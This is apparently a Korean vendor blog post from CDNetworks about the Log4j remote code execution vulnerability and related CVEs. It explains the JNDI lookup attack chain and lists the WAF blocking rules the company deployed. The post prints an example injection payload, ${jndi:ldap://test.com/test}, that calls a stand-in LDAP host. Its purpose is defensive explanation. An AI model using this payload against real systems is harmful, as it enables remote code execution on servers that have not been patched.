CDNetworks를 무료로 체험하세요
대부분의 제품에는 14일간의 무료 체험이 제공됩니다. 신용카드가 필요하지 않습니다.
Apache Log4J 취약점이란 무엇이며 CDNetworks의 WAF 서비스로 이를 완화하는 방법
2021년 12월 29일
2021년 12월 9일에 인기 있는 Apache 패키지에 영향을 미치는 치명적인 RCE(원격 코드 실행) 취약점이 발견되었습니다. Apache Log4J로 알려진 이 제로데이 소프트웨어 취약점은 전 세계 수백만 개의 애플리케이션과 장치에 대한 잠재적인 위협입니다. 전 세계적인 영향으로 NIST(National Institute of Standards and Technology)는 2021년 12월 10일 국가 취약성 데이터베이스의 Log4J 취약성을 해결하는 중요한 CVE-2021-44228을 게시했습니다. 취약한 Java 프로세스에 대한 모든 명령은 가장 높은 CVSS(Common Vulnerability Scoring System) 심각도 수준을 받았습니다.
Log4j란 무엇입니까?
Apache Log4j는 거의 모든 Java 서비스에서 사용되는 Java 기반 로깅 도구 중 하나입니다. Apache Software Foundation에서 제공하는 오픈 소스 소프트웨어인 Apache Log4j는 사용자 작업 및 애플리케이션 동작을 기록하는 데 사용됩니다. 예를 들어 서버를 방문하면 보기 및 오류 확인을 위해 Log4J 도구를 통해 서버에 동작이 기록됩니다.
Log4j 취약점의 영향이 왜 그렇게 심각한가요?
Log4j는 어디에나 있습니다.
Java 기술 스택은 Windows, Linux 및 Mac 운영 체제에서 널리 사용됩니다; IoT 가정 및 상업용 장치에서; 웹 애플리케이션, 백엔드 개발, 빅 데이터 등에서. 개발 도구로서 Java는 Kafka, Elasticsearch, Flink 등과 같은 미들웨어 솔루션에서 찾을 수 있습니다. 또한 수천 개의 글로벌 기업이 Java 서비스를 위해 Log4j 도구를 배포했습니다. 그리고 Log4j는 일반적으로 이름이 바뀌고 재패키징되고 다운로드되기 때문에 취약점은 어디에나 존재할 수 있습니다.
이 취약점은 악용하기 매우 쉽습니다.
Log4J 취약점은 ${jndi:ldap://test.com/test}와 같은 악성 코드를 액세스 로그에 삽입하여 성공적으로 악용될 수 있습니다.
취약점은 어떻게 작동합니까?
2.15.0 이전 버전의 Apache Log4j 로깅 프레임워크의 취약성으로 인해 로그 메시지 또는 로그 메시지 매개 변수를 제어할 수 있는 인증되지 않은 원격 공격자가 로깅을 수행하는 시스템에서 악성 코드를 실행할 수 있습니다. Log4j2 라이브러리에서 메시지 조회 대체가 활성화된 경우 공격자는 로그 메시지의 특정 문자열을 LDAP 서버에서 보낸 임의의 코드 문자열로 대체할 수 있습니다. 대체 문자열이 포함된 메시지가 기록되면 임의 코드가 실행되어 잠재적으로 공격자가 기록을 수행하는 시스템을 제어할 수 있습니다.
Apache Log4j의 기본 구성은 JNDI(Java Naming and Directory Interface) 조회를 지원합니다. 이러한 조회는 안전하지 않은 타사 LDAP 서버에서 개체를 빌드하기 위해 클래스 파일을 다운로드할 때 악용될 수 있습니다.
다음 단계는 Log4J 취약점이 전파되는 방식을 설명합니다.
- 해커는 Log4J에 의해 기록되는
${jndi:ldap://test.com/test}와 같은 헤더에 JNDI 조회를 삽입합니다. - Log4J는 로그에 있는 악성 코드를 처리한 후 악성 LDAP 서버(
/test.com/test)에 쿼리합니다. - 악의적인 LDAP 서버는 악의적인 Java 클래스 파일을 다음 주소로 전송하여 응답합니다. 원본 서버.
취약점이 계속 변이되고 있습니다.
취약점이 발견된 지 보름이 지났습니다. 그 이후로 세 가지 관련 CVE가 식별되었으며 취약성이 계속 변형될 것으로 예상됩니다.
CVE-2021-4104
Apache Log4j JMSAppender는 공격자가 Log4j 구성에 대한 쓰기 권한이 있는 경우 신뢰할 수 없는 데이터의 역직렬화에 취약합니다.
CVE-2021-44228
Apache Log4j JNDI 기능을 사용하면 시스템이 공격자가 제어하는 LDAP 서버 또는 기타 JNDI 관련 엔드포인트와 허가 없이 통신할 수 있습니다.
CVE-2021-45046
Apache Log4j 스레드 컨텍스트 패턴 및 컨텍스트 조회 패턴을 사용하면 악의적인 JNDI 입력 데이터가 서비스 거부(DoS) 공격을 호출할 수 있습니다.
CDNetworks는 계속해서 Log4j 취약점에 집중하고 있습니다.
Log4J 취약점이 보고되자마자 CDNetworks의 보안 팀은 인프라와 제품을 평가하고 취약점의 영향을 완화하기 위한 적절한 업데이트를 수행하기 위한 조치를 취했습니다.
그 결과 위에 표시된 CVE를 해결하고 Log4J 악용 시도를 완화하기 위해 2021년 12월 10일부터 다음과 같은 새로운 웹 애플리케이션 방화벽(WAF) 규칙을 릴리스하고 배포했습니다. 기본적으로 모든 규칙은 차단 모드로 설정됩니다.
| 규칙 ID | 설명 | 기본 작업 |
|---|---|---|
| 9337 | Log4J 본문 | 차단하다 |
| 9930 | 아파치-Log4j RCE | 차단하다 |
| 9959 | log4j의 요청 우회 동작 | 차단하다 |
| 9960 | 아파치-Log4j RCE | 차단하다 |
| 9961 | 아파치-Log4j RCE | 차단하다 |
| 9962 | Apache-Log4j RCE 및 버전 정보 | 차단하다 |
Log4j 악용 동향
2021년 12월 10일부터 12월 26일까지 씨디네트웍스는 2004902건의 악성 Log4J 공격 요청을 성공적으로 차단했습니다.
CDNetworks 보안 팀은 고객이 이러한 취약성으로부터 보호받을 수 있도록 상황을 계속해서 적극적으로 모니터링하고 있습니다. 우리는 개발 보증에 따라 새로운 발견이나 정보로 이 블로그를 업데이트할 것입니다。
더 많은 탐색
CDNetworks WAF, React의 치명적인 취약점 CVE-2025-55182로부터 선제적으로 보호
2025년 12월 3일(EST), React Server Components에서 심각한 보안 취약점이 발견되었으며, CVSS 점수는 10.0입니다.
CDNetworks WAAP: AI 기반 웹 애플리케이션 및 API 보호
CDNetworks는 혁신을 원동력으로 삼아, 디지털 생태계에서 WAAP이 직면한 새로운 과제에 지속적으로 대응하고 있습니다. 이번 글에서는 당사의 WAAP 솔루션의 핵심 기능과 강점을 소개합니다.